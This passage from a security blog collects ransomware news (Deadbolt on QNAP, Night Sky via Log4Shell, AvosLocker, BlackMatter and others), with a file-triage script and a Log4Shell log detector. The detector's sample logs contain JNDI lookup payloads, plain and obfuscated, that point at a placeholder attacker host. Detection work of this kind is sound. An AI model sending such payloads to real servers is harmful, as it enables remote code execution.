The Topleak user pointed out that this was a planned leak, not linked to the recent arrests and takedowns conducted by law enforcement. The alleged ransomware developer added that none of the gang’s members will ever return to ransomware operations and that the source code of every tool they made has been wiped.

In one of the archives leaked by the user there is the source code for a malware dubbed ‘M0yv’ that was part of the gang’s arsenal.

Maze ransomware leak

Source Bleeping Computer

The popular malware researchers Michael Gillespie and Fabian Wosar confirmed to BleepingComputer that the decryption keys are legitimate and allow victims to decrypt files encrypted by the three ransomware families for free.

Emsisoft has released a free decryption tool for the Maze, Egregor, and Sekhmet ransomware families.

Ransomware Protection Playbook

Tags: Master decryption keys


Jan 28 2022

Deadbolt ransomware hits more than 3,600 QNAP NAS devices

Category: Information Security,RansomwareDISC @ 3:41 pm

More than 3,600 network-attached storage (NAS) devices from Taiwanese company QNAP have been infected and had their data encrypted by a new strain of ransomware named Deadbolt.

Devices attacked by the Deadbolt gang are easy to recognize because the login screen is typically replaced with a ransom note, and local files are encrypted and renamed with a .deadbolt extension.

The threat actor behind the attacks is extorting not only the owners of the NAS devices but also the QNAP company itself.

According to a copy of the ransom note, device owners are told to pay 0.03 Bitcoin ($1,100) to receive a decryption key to unlock their files, while in a second note the hackers demand 5 Bitcoin ($1.86 million) from QNAP to reveal details about the supposed zero-day vulnerability they have been using to attack its users, and another 50 Bitcoin ($18.6 million) to release a master decryption key that unlocks all of the victims’ files.

For its part, QNAP was quick to formally acknowledge the attacks in a blog post on Wednesday, hours after hundreds of users started flocking to its support forum to report finding their files encrypted.

In the first days following the attack, the company told users to disconnect devices from the internet and, if that is not possible, at least to disable features such as port forwarding and UPnP on their routers, to prevent attackers from connecting to the NAS systems.
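The post notes that Deadbolt renames encrypted files with a .deadbolt extension. A first triage step in an incident like this is to measure the blast radius: how many files carry the extension, what they were called before, and which folders were hit completely. The following script is an added example and not QNAP’s or the original post’s code; the directory tree it scans is constructed in a temporary folder, and the extension set is a parameter so the same walk works for other families.

```python
"""Triage a file tree for files renamed by ransomware.

Added example (not from the original post). Walks a directory, counts files
carrying a known ransomware extension such as ".deadbolt", reports the name
each one was presumably renamed from, and flags directories where every file
was encrypted. The sample tree is constructed in a temporary directory.
"""
import os
import tempfile
from collections import Counter


def triage_tree(root, extensions=frozenset({".deadbolt"})):
    """Walk `root` and summarise files whose last extension is in `extensions`.

    Returns a dict with:
      total        - number of regular files seen
      encrypted    - number of files carrying one of `extensions`
      by_ext       - Counter of encrypted files per extension
      renamed_from - list of (encrypted path, presumed original path)
      hot_dirs     - directories (relative to root) where every file is encrypted
    """
    total = 0
    encrypted = 0
    by_ext = Counter()
    renamed_from = []
    hot_dirs = []
    for dirpath, _dirnames, filenames in os.walk(root):
        dir_total = 0
        dir_encrypted = 0
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):  # skip sockets, broken symlinks, etc.
                continue
            total += 1
            dir_total += 1
            ext = os.path.splitext(name)[1].lower()
            if ext in extensions:
                encrypted += 1
                dir_encrypted += 1
                by_ext[ext] += 1
                # The suffix is appended to the original name, so stripping the
                # last extension gives the name the owner will recognise.
                renamed_from.append((path, path[: -len(ext)]))
        if dir_total and dir_encrypted == dir_total:
            hot_dirs.append(os.path.relpath(dirpath, root))
    return {
        "total": total,
        "encrypted": encrypted,
        "by_ext": by_ext,
        "renamed_from": renamed_from,
        "hot_dirs": sorted(hot_dirs),
    }


def build_sample_tree():
    """Create a constructed sample tree: one folder fully encrypted, one partly,
    one untouched. Returns the root path. File contents are placeholders."""
    root = tempfile.mkdtemp(prefix="deadbolt-triage-")
    layout = {
        "Photos/holiday.jpg.deadbolt": b"\x00" * 16,
        "Photos/family.png.deadbolt": b"\x00" * 16,
        "Docs/report.docx.deadbolt": b"\x00" * 16,
        "Docs/notes.txt": b"plain text, not touched",
        "Backup/archive.tar": b"tar contents",
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    summary = triage_tree(root)
    print(f"{summary['encrypted']} of {summary['total']} files carry a ransomware extension")
    for enc, orig in summary["renamed_from"]:
        print(f"  {os.path.relpath(enc, root)} <- {os.path.relpath(orig, root)}")
    print("fully encrypted directories:", summary["hot_dirs"])
```

The `hot_dirs` list is the useful output for prioritising restores: a folder where every file was renamed is one where the encryption ran to completion, while a folder with a mix suggests the process was interrupted or skipped some types.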

https://

/deadbolt-ransomware-hits-more-than-3600-qnap-nas-devices/

Ransomware Protection Playbook

Tags: Deadbolt ransomware, QNAP NAS, Ransomware Protection Playbook


Jan 11 2022

Night Sky ransomware operators exploit Log4Shell to target hack VMware Horizon servers

Category: Information Security,Log Management,Log4j,RansomwareDISC @ 10:40 am

The Night Sky ransomware operation started exploiting the Log4Shell flaw in the Log4j library to gain access to VMware Horizon systems.

The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations, from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen from victims that do not pay the ransom.

Researchers from MalwareHunterTeam first spotted the ransomware family; once it encrypts a file, the ransomware appends the ‘.nightsky’ extension to the file name.

In early January, threat actors started targeting VMware Horizon systems exposed on the Internet. VMware has addressed Log4Shell in Horizon with the release of versions 2111, 7.13.1, and 7.10.3, but unfortunately many unpatched systems are still exposed online.

On Monday, Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.
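Because the campaign above reaches Horizon through Log4Shell, the first place defenders look is the web-facing request log: an exploitation attempt has to carry a `${jndi:...}` lookup string in some logged field, and attackers routinely wrap the token in nested lookups so a naive grep for the literal word misses it. The detector below is an added example and not Microsoft’s, VMware’s or the original post’s code; the log lines are constructed, the hostnames are placeholders, and the nested-lookup forms it collapses are the common single-character ones (`${lower:x}`, `${upper:x}`, `${...:-x}`).

```python
"""Scan web-server log lines for Log4Shell-style JNDI lookup strings.

Added example (not from the original post). It first collapses the nested
lookups used to hide the literal "jndi" token, then reports every line that
still contains a "${jndi:<scheme>:" lookup. Log lines are constructed and the
hosts are placeholders.
"""
import re

# ${lower:j}, ${upper:J}, ${::-j} and ${env:NOPE:-j} all evaluate to "j" in Log4j 2.
NESTED_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^}])\}|\$\{[^{}]*:-([^{}])\}", re.IGNORECASE
)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(line, max_rounds=5):
    """Collapse single-character nested lookups so obfuscated variants reduce
    to their plain form. Bounded so pathological input cannot loop forever."""
    for _ in range(max_rounds):
        collapsed = NESTED_LOOKUP.sub(lambda m: m.group(1) or m.group(2), line)
        if collapsed == line:
            break
        line = collapsed
    return line


def find_jndi_lookups(lines):
    """Return [(line_number, scheme, original_line), ...] for each line that
    carries a JNDI lookup after normalisation. line_number is 1-based and the
    scheme (ldap, rmi, dns, ...) is lower-cased for easy grouping."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


# Constructed access-log lines in combined format; 203.0.113.7 and
# attacker.invalid are documentation/placeholder addresses.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2022:09:12:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:09:12:44 +0000] "GET /portal/ HTTP/1.1" 200 812 "-" "${jndi:ldap://attacker.invalid:1389/a}"',
    '203.0.113.7 - - [10/Jan/2022:09:13:02 +0000] "GET /broker/xml HTTP/1.1" 200 331 "-" "${${lower:j}${upper:n}di:${::-r}mi://attacker.invalid/b}"',
    '10.0.0.9 - - [10/Jan/2022:09:14:10 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for number, scheme, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: jndi lookup via {scheme}: {line}")
```

Only lines 2 and 3 of the sample are reported; line 4 contains a `${...}` lookup that is not JNDI and stays quiet, which matters because a rule that alerts on every `${` would be too noisy to keep enabled. A hit is evidence of an attempt, not of success: confirm against the Horizon build (the fixed releases are listed above) and look for the outbound LDAP or RMI connection from the server before treating the host as compromised.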

Tags: Log4shell, Night Sky ransomware


Dec 30 2021

AvosLocker ransomware gang releases a free decryptor after an affiliate hit US gov agency

Category: RansomwareDISC @ 10:44 am

The AvosLocker ransomware operation provided a free decryptor after they encrypted the systems of a US government agency.

According to BleepingComputer, the gang hit a police department but, fearing the reaction of US law enforcement, opted to release a free decryptor to the government entity.

The incident was accidental: one of the affiliates of the RaaS service hit the government agency, and AvosLocker discovered the name of the victim only after their malware had encrypted its systems.

Recently, major ransomware operations were targeted by international operations conducted by law enforcement. In recent months, the police identified and arrested members and affiliates of several gangs, including the REvil, Egregor, and Clop ransomware gangs.

Despite the success of the police operations, ransomware gangs continue to target organizations worldwide; in 2021 several groups rebranded as new operations to evade sanctions.

BleepingComputer, which reached out to the AvosLocker gang, said that its operators are “not worried about law enforcement as they have no jurisdiction in the motherland.”

This is another problem: the fight against ransomware gangs needs the collaboration of the law enforcement agencies of every country, especially Russia, where many ransomware groups have their origin.

Tags: AvosLocker, decryptor


Dec 24 2021

Anti-Ransomware Checklist

Category: RansomwareDISC @ 12:41 pm

Ransomware Protection Playbook

https://www.facebook.com/DISCInfoSec/shop/

https://www.amazon.com/shop/discinfosec

Tags: ransomware, ransomware checklist, Ransomware Protection Playbook


Dec 09 2021

ALPHV BlackCat – This year’s most sophisticated ransomware

Category: RansomwareDISC @ 10:29 pm

Ransomware Protection Playbook

Tags: Ransomware Protection Playbook


Nov 03 2021

A ransomware reality check for CISOs

Category: CISO,Ransomware,vCISODISC @ 10:00 pm

The dilemmas organizations must deal with are dizzying:

  • To pay a ransom or not?
  • Will cyber insurance provide adequate shelter?
  • What’s the role of government?
  • Are new mandates and penalties on the horizon?
  • How are adversaries evolving their tactics?

To make sense of it all, let’s first focus on the adversaries and their playbook. Cyber criminals have a well-developed business model and carefully contemplated financial calculus of ransomware. They have determined whether they will launch a direct attack to maximize profits or offer Ransomware-as-a-Service, complete with a help desk and other support services, to supplement their income while enabling malicious actors with less technical skill.

They have researched their victims and targeted organizations based on their ability to pay. All these tactics are developed and executed in concert to make paying the ransom the path of least resistance – financially and logically.

Every aspect of a ransomware campaign is calculated to elicit an emotional response from the target such that it is easier to pay the ransom than to bear the costs and delays of trying to recover on their own.

Let’s start with what we shouldn’t do

Ransomware Protection Playbook

Tags: CISO, ransomware attacks, Ransomware Protection Playbook, vCISO


Oct 22 2021

FIN7 cybercrime gang creates fake cybersecurity firm to recruit pentesters for ransomware attacks

Category: Cyber crime,Cybercrime,Pen Test,RansomwareDISC @ 9:08 am

The FIN7 hacking group is attempting to enter the ransomware business and is doing it with an interesting technique. The gang creates fake cybersecurity companies that hire experts and task them with carrying out attacks under the guise of pentesting engagements.

FIN7 is a Russian criminal group that has been active since mid-2015; it focuses on the restaurant, gambling, and hospitality industries in the US to harvest financial information that is then used in attacks or sold in cybercrime marketplaces.

One of the companies created by the cybercriminal organization for this purpose is Combi Security, and researchers from Gemini Advisory discovered other similar organizations by analyzing the site of another fake cybersecurity company named Bastion Secure.

The Bastion Secure website is hosted on the Russian domain registrar Beget, which is popular in the Russian cybercrime communities. Most of the submenus of the site return a Russian-language HTTP 404 error, a circumstance that suggests the site creators were Russian speakers. At the time of the report, some of the HTTP 404 errors remain unfixed.

The website is a clone of the website of Convergent Network Solutions Ltd; Bastion Secure’s ‘About’ page states that it is a spin-off of that legitimate cybersecurity firm, which has no link to the criminal gang.

Pentest as a Service (PtaaS)

Tags: FIN7, pentester, ransomware attacks


Oct 19 2021

FBI, CISA, NSA published a joint advisory on BlackMatter ransomware operations

Category: RansomwareDISC @ 12:57 pm

The FBI, CISA, and NSA have published a joint advisory about the operations of the BlackMatter ransomware gang that provides defense recommendations.

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have published an advisory that provides details about the BlackMatter ransomware operations and defense recommendations.

This advisory provides information on tactics, techniques, and procedures (TTPs) associated with the ransomware gang that were obtained from the analysis of a sample of BlackMatter ransomware as well as from trusted third-party reporting.

The BlackMatter group launched its operations at the end of July; the gang claims to be the successor of the DarkSide and REvil groups. Like other ransomware operations, BlackMatter also set up a leak site where it publishes data exfiltrated from the victims before encrypting their systems.

The launch of the BlackMatter ransomware-as-a-service (RaaS) was first spotted by researchers at Recorded Future, who also reported that the gang is setting up a network of affiliates using ads posted on two cybercrime forums, Exploit and XSS.

Tags: BlackMatter ransomware


Oct 15 2021

U.S. Treasury Offers Crypto Guidance Amid Ransomware Surge

Category: Crypto,Information Security,RansomwareDISC @ 12:48 pm

US Treasury says there was $590M in suspicious ransomware activity in H1 2021, exceeding the entire amount in 2020, when $416M was reported  —  Suspicious activity reports related to ransomware jumped significantly in 2021, according to the U.S. Treasury Department’s Financial Crimes Enforcement Network.

There was $590 million in suspicious activity related to ransomware in the first six months of 2021, exceeding the entire amount in 2020, when $416 million was reported, according to a report released Friday by the U.S. Treasury Department’s Financial Crimes Enforcement Network.

The average amount of reported ransomware transactions per month in 2021 was $102.3 million, according to the report. If the current trend continues, suspicious activity reports filed in 2021 “are projected to have a higher ransomware-related transaction value than SARs filed in the previous 10 years combined,” according to the report. SARs is shorthand for suspicious activity reports.

U.S.-based cybersecurity companies filed most of the SARs related to ransomware, while banks and cryptocurrency exchanges filed more than a third of the reports. The reports reflect just how quickly ransomware attacks have grown.

The report offers new insight into the scale of ransomware attacks devastating U.S. businesses and impacting critical infrastructure. A Treasury spokesperson said the SARs don’t represent all ransomware payments. 

Reporting ransomware payments to the Treasury via a suspicious activity report is often a requirement of cybersecurity insurance policies, according to a person familiar with the matter. 

The Treasury Department also identified 68 ransomware variants, noting that the most commonly reported types were REvil, Conti and DarkSide. Ransomware groups often sell their malware, or variant, to affiliates who then use it to plot attacks, in what is known as ransomware-as-a-service. REvil, Conti and DarkSide are suspected by cybersecurity firms of being tied to Russia in some way — because they use the Russian language or are suspected of being based there.  

The report was filed as the Treasury Department issued guidance to the virtual currency industry to prevent exploitation by entities sanctioned by the U.S. and ransomware groups. It is part of a broader effort by the Biden administration to attempt to curb ransomware attacks. In ransomware attacks, hackers encrypt a victim’s files and promise to unlock them if they are paid a fee.

Among the more notable attacks were those in May on Colonial Pipeline Co., which squeezed fuel supplies on the East Coast, and on the meatpacker JBS SA.

The Treasury report stated that ransomware actors are increasingly requesting payment in cryptocurrencies like Monero, which are designed to enhance anonymity. 

More: BleepingComputer, The Record, CNET, The Hill, PYMNTS.com, CyberScoop, and CoinDesk

Tags: Ransomware Surge, U.S. Treasury


Oct 15 2021

Three more ransomware attacks hit Water and Wastewater systems in 2021

Category: RansomwareDISC @ 9:17 am

A joint cybersecurity advisory published by US agencies revealed three ransomware attacks on water and wastewater systems this year.

A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched by ransomware gangs against US water and wastewater treatment facilities (WWS) this year.

This is the first time these attacks have been publicly disclosed; they took place in March, July, and August respectively. The three facilities hit by ransomware operators are located in the states of Nevada, Maine, and California. In all three attacks the ransomware encrypted files on the infected systems, and in one of the incidents the threat actors compromised a system used to control SCADA industrial equipment.

The advisory reports common tactics, techniques, and procedures (TTPs) used by threat actors to compromise IT and OT networks of WWS facilities, they include:

  • Spearphishing campaigns aimed at personnel to deliver malicious payloads such as ransomware and RATs;
  • Exploitation of services and applications exposed online that enable remote access to WWS networks (e.g., RDP access);
  • Exploitation of vulnerabilities affecting control systems running vulnerable firmware versions.

The three new incidents included in the advisory

What’s the Difference Between OT, ICS, SCADA and DCS?

Tags: ICS, OT, SCADA, wastewater system

